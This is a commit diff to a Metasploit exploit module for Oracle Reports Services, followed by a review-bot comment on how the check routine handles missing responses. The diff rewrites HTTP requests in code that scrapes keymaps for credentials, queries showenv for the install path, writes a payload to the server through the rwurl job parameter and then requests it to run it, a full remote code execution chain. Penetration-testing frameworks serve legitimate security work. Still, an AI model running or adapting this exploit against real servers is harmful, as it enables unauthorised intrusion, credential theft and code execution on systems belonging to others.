bug/bundler_fix
Mekanismen 2014-01-31 21:59:26 +01:00
parent f6291eb9a8
commit 5a883a4477
1 changed files with 39 additions and 40 deletions


@ -67,19 +67,16 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
url = datastore['RHOST'] res = send_request_cgi({
url = "http://" + url + "/reports/rwservlet/showmap" 'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showmap"),
uri = URI.parse(url) 'method' => 'GET'
begin })
html = uri.open.read
rescue unless res and res.body.include?("Reports Services")
return Exploit::CheckCode::Safe
end
if html =~ /Reports Servlet Key Map/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
end end
return Exploit::CheckCode::Appears
end end
def exploit def exploit
@ -89,28 +86,26 @@ class Metasploit3 < Msf::Exploit::Remote
@payload_dir = datastore['PAYDIR'] @payload_dir = datastore['PAYDIR']
@local_path = "" @local_path = ""
@url = datastore['RHOST'] uri = target_uri.path
url = "http://" + @url + "/reports/rwservlet/showmap" res = send_request_cgi({
uri = URI.parse(url) 'uri' => normalize_uri(uri, "/reports/rwservlet/showmap"),
begin 'method' => 'GET'
html = uri.open.read })
rescue
fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable")
end
if html.include?("Reports Servlet Key Map") if res and res.body.include?("Reports Services")
test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten test = res.body.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
#Parse keymaps for servers #Parse keymaps for servers
print_status "#{peer} - Enumerating keymaps ... " print_status "#{peer} - Enumerating keymaps ... "
uri = target_uri.path
test.each do |t| test.each do |t|
if not @hacked if not @hacked
t = t.delete(' ') t = t.delete(' ')
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"), 'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"),
'method' => 'GET', 'method' => 'GET',
}) })
if res and res.code == 200 if res and res.code == 200
if res.body =~ /userid=(.*)@/ if res.body =~ /userid=(.*)@/
authid = $1 authid = $1
@ -161,20 +156,23 @@ class Metasploit3 < Msf::Exploit::Remote
print_good "#{peer} - Found credentials: #{authid}" print_good "#{peer} - Found credentials: #{authid}"
print_status "#{peer} - Querying showenv ..." print_status "#{peer} - Querying showenv ..."
url = "http://" + @url + "/reports/rwservlet/showenv?server=#{server}&authid=#{authid}" res = send_request_cgi({
uri = URI.parse(url) 'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"),
begin 'method' => 'GET',
html = uri.open.read 'vars_get' => {
rescue 'server' => server,
print_status("#{peer} - Query failed") 'authid' => authid
else }
if html =~ /\\(.*)\\showenv/ })
if res and res.code == 200
if res.body =~ /\\(.*)\\showenv/
print_good "#{peer} - Query succeeded!" print_good "#{peer} - Query succeeded!"
print_status "#{peer} - Windows install detected " print_status "#{peer} - Windows install detected "
print_status "#{peer} - Uploading payload ..." print_status "#{peer} - Uploading payload ..."
@local_path = $1.gsub("\\", "/") @local_path = $1.gsub("\\", "/")
setup_payload setup_payload
elsif html =~ /\/(.*)\/showenv/ elsif res.body =~ /\/(.*)\/showenv/
print_good "#{peer} - Query succeeded!" print_good "#{peer} - Query succeeded!"
print_status "#{peer} - Linux install detected" print_status "#{peer} - Linux install detected"
print_status "#{peer} - Uploading payload ..." print_status "#{peer} - Uploading payload ..."
@ -189,9 +187,8 @@ class Metasploit3 < Msf::Exploit::Remote
def upload_payload def upload_payload
path = "/#{@local_path}#{@payload_dir}#{@payload_name}" path = "/#{@local_path}#{@payload_dir}#{@payload_name}"
uri = target_uri.path
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(uri, "/reports/rwservlet"), 'uri' => normalize_uri(target_uri.path, "/reports/rwservlet"),
'method' => 'GET', 'method' => 'GET',
'encode_params' => false, 'encode_params' => false,
'vars_get' => { 'vars_get' => {
@ -201,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
'desname' => path, 'desname' => path,
'JOBTYPE' => 'rwurl', 'JOBTYPE' => 'rwurl',
'URLPARAMETER' => @payload_url 'URLPARAMETER' => @payload_url
} }
}) })
if res and res.body.include?("Successfully run") if res and res.body.include?("Successfully run")
@ -244,12 +241,14 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exec_payload def exec_payload
print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}") if @hacked
print_status("#{peer} - Executing payload...") print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
print_status("#{peer} - Executing payload...")
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name), 'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name),
'method' => 'GET' 'method' => 'GET'
}) })
end
end end
end end
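Review bot: In `check`, a missing response is still reported as `Exploit::CheckCode::Safe`, because `unless res and res.body.include?("Reports Services")` treats a nil `res` (timeout, refused connection) the same as a page that lacks the marker. A host that was merely unreachable is then recorded as not vulnerable, which skews any assessment built on the check result. Splitting the guard keeps the two cases apart: `return Exploit::CheckCode::Unknown unless res` followed by `return Exploit::CheckCode::Safe unless res.body.include?("Reports Services")`. The second hunk has a related gap in `exploit`: the removed `fail_with(Failure::Unknown, ...)` has no visible replacement, so a nil `res` appears to fall through `if res and res.body.include?("Reports Services")` silently unless an `else` branch exists outside the shown lines.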